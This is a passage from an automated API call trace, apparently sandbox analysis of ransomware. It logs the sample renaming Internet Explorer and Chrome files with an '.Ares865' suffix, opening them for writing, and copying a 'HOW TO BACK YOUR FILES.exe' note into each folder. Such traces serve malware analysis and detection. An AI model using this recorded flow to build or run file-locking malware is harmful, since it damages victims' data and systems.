hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2048) returned 1 [0140.548] lstrcpyW (in: lpString1=0x2cce45e, lpString2="ielowutil.exe.mui" | out: lpString1="ielowutil.exe.mui") returned="ielowutil.exe.mui" [0140.548] lstrlenW (lpString="ielowutil.exe.mui") returned 17 [0140.548] lstrlenW (lpString="Ares865") returned 7 [0140.548] lstrcmpiW (lpString1="exe.mui", lpString2="Ares865") returned 1 [0140.549] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\en-US\\ielowutil.exe.mui.Ares865") returned 72 [0140.549] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\ielowutil.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\ielowutil.exe.mui"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\ielowutil.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\ielowutil.exe.mui.ares865"), dwFlags=0x1) returned 1 [0140.550] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\ielowutil.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\ielowutil.exe.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.551] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2048) returned 1 [0140.553] lstrcpyW (in: lpString1=0x2cce45e, lpString2="iexplore.exe.mui" | out: lpString1="iexplore.exe.mui") returned="iexplore.exe.mui" [0140.554] lstrlenW (lpString="iexplore.exe.mui") returned 16 [0140.554] lstrlenW (lpString="Ares865") returned 7 [0140.554] lstrcmpiW (lpString1="exe.mui", lpString2="Ares865") returned 1 [0140.554] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui.Ares865") returned 71 [0140.554] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui.ares865"), dwFlags=0x1) returned 1 [0140.556] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.556] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5120) returned 1 [0140.558] lstrcpyW (in: lpString1=0x2cce45e, lpString2="jsdbgui.dll.mui" | out: lpString1="jsdbgui.dll.mui") returned="jsdbgui.dll.mui" [0140.558] lstrlenW (lpString="jsdbgui.dll.mui") returned 15 [0140.558] lstrlenW (lpString="Ares865") returned 7 [0140.558] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0140.558] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdbgui.dll.mui.Ares865") returned 70 [0140.558] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdbgui.dll.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsdbgui.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdbgui.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsdbgui.dll.mui.ares865"), dwFlags=0x1) returned 1 [0140.560] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdbgui.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsdbgui.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.560] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11776) returned 1 [0140.563] lstrcpyW (in: lpString1=0x2cce45e, lpString2="jsdebuggeride.dll.mui" | out: lpString1="jsdebuggeride.dll.mui") returned="jsdebuggeride.dll.mui" [0140.563] lstrlenW (lpString="jsdebuggeride.dll.mui") returned 21 [0140.563] lstrlenW (lpString="Ares865") returned 7 [0140.563] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0140.564] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui.Ares865") returned 76 [0140.564] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsdebuggeride.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsdebuggeride.dll.mui.ares865"), dwFlags=0x1) returned 1 [0140.565] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsdebuggeride.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.566] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2048) returned 1 [0140.568] lstrcpyW (in: lpString1=0x2cce45e, lpString2="JSProfilerCore.dll.mui" | out: lpString1="JSProfilerCore.dll.mui") returned="JSProfilerCore.dll.mui" [0140.568] lstrlenW (lpString="JSProfilerCore.dll.mui") returned 22 [0140.568] lstrlenW (lpString="Ares865") returned 7 [0140.568] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0140.569] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui.Ares865") returned 77 [0140.569] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsprofilercore.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsprofilercore.dll.mui.ares865"), dwFlags=0x1) returned 1 [0140.570] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsprofilercore.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.571] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2048) returned 1 [0140.573] lstrcpyW (in: lpString1=0x2cce45e, lpString2="jsprofilerui.dll.mui" | out: lpString1="jsprofilerui.dll.mui") returned="jsprofilerui.dll.mui" [0140.573] lstrlenW (lpString="jsprofilerui.dll.mui") returned 20 [0140.573] lstrlenW (lpString="Ares865") returned 7 [0140.573] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0140.574] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsprofilerui.dll.mui.Ares865") returned 75 [0140.574] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsprofilerui.dll.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsprofilerui.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsprofilerui.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsprofilerui.dll.mui.ares865"), dwFlags=0x1) returned 1 [0140.575] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsprofilerui.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsprofilerui.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.575] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7168) returned 1 [0140.580] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Google", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google") returned="C:\\Program Files (x86)\\Google" [0140.580] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google" | out: lpString1="C:\\Program Files (x86)\\Google") returned="C:\\Program Files (x86)\\Google" [0140.580] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0140.580] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\how to back your files.exe"), bFailIfExists=1) returned 0 [0140.581] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0140.581] GetLastError () returned 0x0 [0140.582] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0140.582] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x532aa4c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x532aa4c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0140.582] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0140.582] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0140.582] lstrcpyW (in: lpString1=0x2cce43c, lpString2="Chrome" | out: lpString1="Chrome") returned="Chrome" [0140.582] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7908 [0140.582] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4a) returned 0x2ed8f8 [0140.582] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7910 | out: ListHead=0x2e7710, ListEntry=0x2e7910) returned 0x2e78f0 [0140.582] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x532aa4c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x532aa4c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CrashReports", cAlternateFileName="CRASHR~1")) returned 1 [0140.582] lstrcmpiW (lpString1="CrashReports", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0140.582] lstrcmpiW (lpString1="CrashReports", lpString2="aoldtz.exe") returned 1 [0140.582] lstrcpyW (in: lpString1=0x2cce43c, lpString2="CrashReports" | out: lpString1="CrashReports") returned="CrashReports" [0140.582] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7928 [0140.582] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x56) returned 0x2df710 [0140.582] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7930 | out: ListHead=0x2e7710, ListEntry=0x2e7930) returned 0x2e7910 [0140.582] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x532aa4c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x532aa4c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0140.583] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0140.583] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x532aa4c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x532aa4c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0140.583] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0140.583] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7930 [0140.583] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Google\\CrashReports", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\CrashReports") returned="C:\\Program Files (x86)\\Google\\CrashReports" [0140.583] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\CrashReports" | out: lpString1="C:\\Program Files (x86)\\Google\\CrashReports") returned="C:\\Program Files (x86)\\Google\\CrashReports" [0140.583] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0140.583] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\CrashReports\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\crashreports\\how to back your files.exe"), bFailIfExists=1) returned 0 [0140.584] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0140.584] GetLastError () returned 0x0 [0140.585] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0140.585] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\CrashReports\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x532aa4c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x532aa4c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0140.585] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0140.585] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0140.585] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Google\\Chrome", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome") returned="C:\\Program Files (x86)\\Google\\Chrome" [0140.585] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome") returned="C:\\Program Files (x86)\\Google\\Chrome" [0140.585] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0140.585] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\how to back your files.exe"), bFailIfExists=1) returned 0 [0140.586] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0140.586] GetLastError () returned 0x0 [0140.587] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0140.587] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7aa9d740, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x532aa4c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x532aa4c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0140.587] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0140.587] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0140.587] lstrcpyW (in: lpString1=0x2cce44a, lpString2="Application" | out: lpString1="Application") returned="Application" [0140.587] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7908 [0140.587] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x62) returned 0x2d2ef0 [0140.587] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7910 | out: ListHead=0x2e7710, ListEntry=0x2e7910) returned 0x2e78f0 [0140.587] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x532aa4c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x532aa4c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0140.587] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0140.587] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x532aa4c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x532aa4c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0140.587] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0140.587] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7910 [0140.587] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application" [0140.588] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application" [0140.588] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0140.588] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\how to back your files.exe"), bFailIfExists=1) returned 0 [0140.589] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0140.589] GetLastError () returned 0x0 [0140.589] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0140.589] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x532f6780, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x532f6780, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0140.589] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0140.590] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0140.590] lstrcpyW (in: lpString1=0x2cce462, lpString2="58.0.3029.110" | out: lpString1="58.0.3029.110") returned="58.0.3029.110" [0140.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7908 [0140.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f00d8 [0140.590] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7910 | out: ListHead=0x2e7710, ListEntry=0x2e7910) returned 0x2e78f0 [0140.590] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7344dbd0, ftLastWriteTime.dwHighDateTime=0x1d2c8a4, nFileSizeHigh=0x0, nFileSizeLow=0x117358, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chrome.exe", cAlternateFileName="")) returned 1 [0140.590] lstrcmpiW (lpString1="chrome.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0140.590] lstrcmpiW (lpString1="chrome.exe", lpString2="aoldtz.exe") returned 1 [0140.590] lstrcpyW (in: lpString1=0x2cce462, lpString2="chrome.exe" | out: lpString1="chrome.exe") returned="chrome.exe" [0140.590] lstrlenW (lpString="chrome.exe") returned 10 [0140.590] lstrlenW (lpString="Ares865") returned 7 [0140.590] lstrcmpiW (lpString1="ome.exe", lpString2="Ares865") returned 1 [0140.591] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe.Ares865") returned 67 [0140.591] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\chrome.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\chrome.exe.ares865"), dwFlags=0x1) returned 1 [0140.592] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\chrome.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.592] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1143640) returned 1 [0140.653] lstrcpyW (in: lpString1=0x2cce462, lpString2="chrome.VisualElementsManifest.xml.Ares865" | out: lpString1="chrome.VisualElementsManifest.xml.Ares865") returned="chrome.VisualElementsManifest.xml.Ares865" [0140.653] lstrlenW (lpString="chrome.VisualElementsManifest.xml.Ares865") returned 41 [0140.653] lstrlenW (lpString="Ares865") returned 7 [0140.653] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0140.653] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x532f6780, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x532f6780, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0140.653] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0140.653] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53368ba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53368ba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SetupMetrics", cAlternateFileName="SETUPM~1")) returned 1 [0140.653] lstrcmpiW (lpString1="SetupMetrics", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0140.653] lstrcmpiW (lpString1="SetupMetrics", lpString2="aoldtz.exe") returned 1 [0140.653] lstrcpyW (in: lpString1=0x2cce462, lpString2="SetupMetrics" | out: lpString1="SetupMetrics") returned="SetupMetrics" [0140.653] RtlAllocateHeap 